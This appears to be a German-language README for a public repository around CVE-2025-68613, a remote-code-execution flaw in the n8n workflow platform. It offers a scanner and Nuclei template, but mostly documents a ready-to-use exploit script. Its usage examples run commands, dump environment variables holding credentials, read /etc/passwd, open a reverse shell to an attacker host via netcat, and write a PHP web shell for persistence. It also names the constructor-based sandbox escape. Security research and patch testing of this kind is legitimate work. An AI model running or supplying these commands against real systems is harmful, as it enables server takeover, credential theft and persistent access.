
Öffentlicher PoC + Scanner und Forschung für CVE-2025-68613: Kritische RCE in n8n Workflow-Automatisierung via Expression Injection (CVSS 10.0). Enthält Erkennungstools, vollständigen Exploit und Behebungsanleitung.

CVE-2025-68613 ist eine kritische Remote Code Execution (RCE)-Sicherheitslücke, die in n8n, einer beliebten Open-Source-Workflow-Automatisierungsplattform, entdeckt wurde. Diese Sicherheitslücke ermöglicht authentifizierten Benutzern die Ausführung von beliebigem Code auf dem Server, was potenziell zu einer vollständigen Systemkompromittierung führen kann.
n8n ist eine Open-Source-Workflow-Automatisierungsplattform, die es Benutzern ermöglicht:
Organisationen nutzen n8n, um:
Diese zentrale Rolle in der IT-Infrastruktur macht Sicherheitslücken besonders gefährlich, da sie Angreifern Zugang zu gesamten Netzwerken und sensiblen Daten verschaffen können.
Dieses Repository enthält einsatzbereite Tools zur Erkennung von Sicherheitslücken und zum Testen von Exploits:
cve-2025-68613-scanner.pyZweck: Sichere, nicht ausnutzende Erkennung von anfälligen n8n-Instanzen
Funktionen:
Verwendung:
python3 cve-2025-68613-scanner.py --target https://target.n8n.instancebash
python3 cve-2025-68613-scanner.py -u http://target:5678
**Output**:
- Exit code 0: Nicht anfällig
- Exit code 1: Version unbestimmt (möglicherweise gepatcht oder versteckt)
- Exit code 2: Anfällige Version erkannt
### 2. Nuclei Template: `CVE-2025-68613.yaml`
**Zweck**: Automatisierte Schwachstellenerkennung und grundlegende Ausdrucksauswertungstests
**Funktionen**:
- Erfordert gültigen Authentifizierungstoken
- Testet Expression-Injection-Fähigkeit
- Versucht, den Node.js-Globalkontext zu lesen (process.platform)
- Erstellt Test-Workflows zur Validierung des RCE-Vektors
- CVSS 10.0 Kritische Schweregrad-Einstufung
**Verwendung**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v
# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt
exploit_cve-2025-68613.pyZweck: Vollständiger Proof-of-Concept-Exploit mit mehreren Angriffs-Payloads
Funktionen:
Voraussetzungen:
Installation:```bash pip install requests chmod +x exploit_cve-2025-68613.py
**Anwendungsbeispiele**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload info
# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload cmd --command "whoami"
# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload env
# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload read --file "/etc/passwd"
# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload write \
--file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'
Wie es funktioniert:
this.constructor.constructor() verwendet wirdprocess.platform oder andere Node.js-APIs ausExit-Codes:
Einfach ausgedrückt: n8n erlaubt es Benutzern, Ausdrücke (Expressions) in Workflows zu schreiben, um Daten dynamisch zu verarbeiten. Diese Ausdrücke werden jedoch ohne ordnungsgemäßen Sandbox-Schutz ausgewertet, sodass Angreifer aus dem vorgesehenen Ausführungskontext ausbrechen und beliebigen Code auf dem Server ausführen können.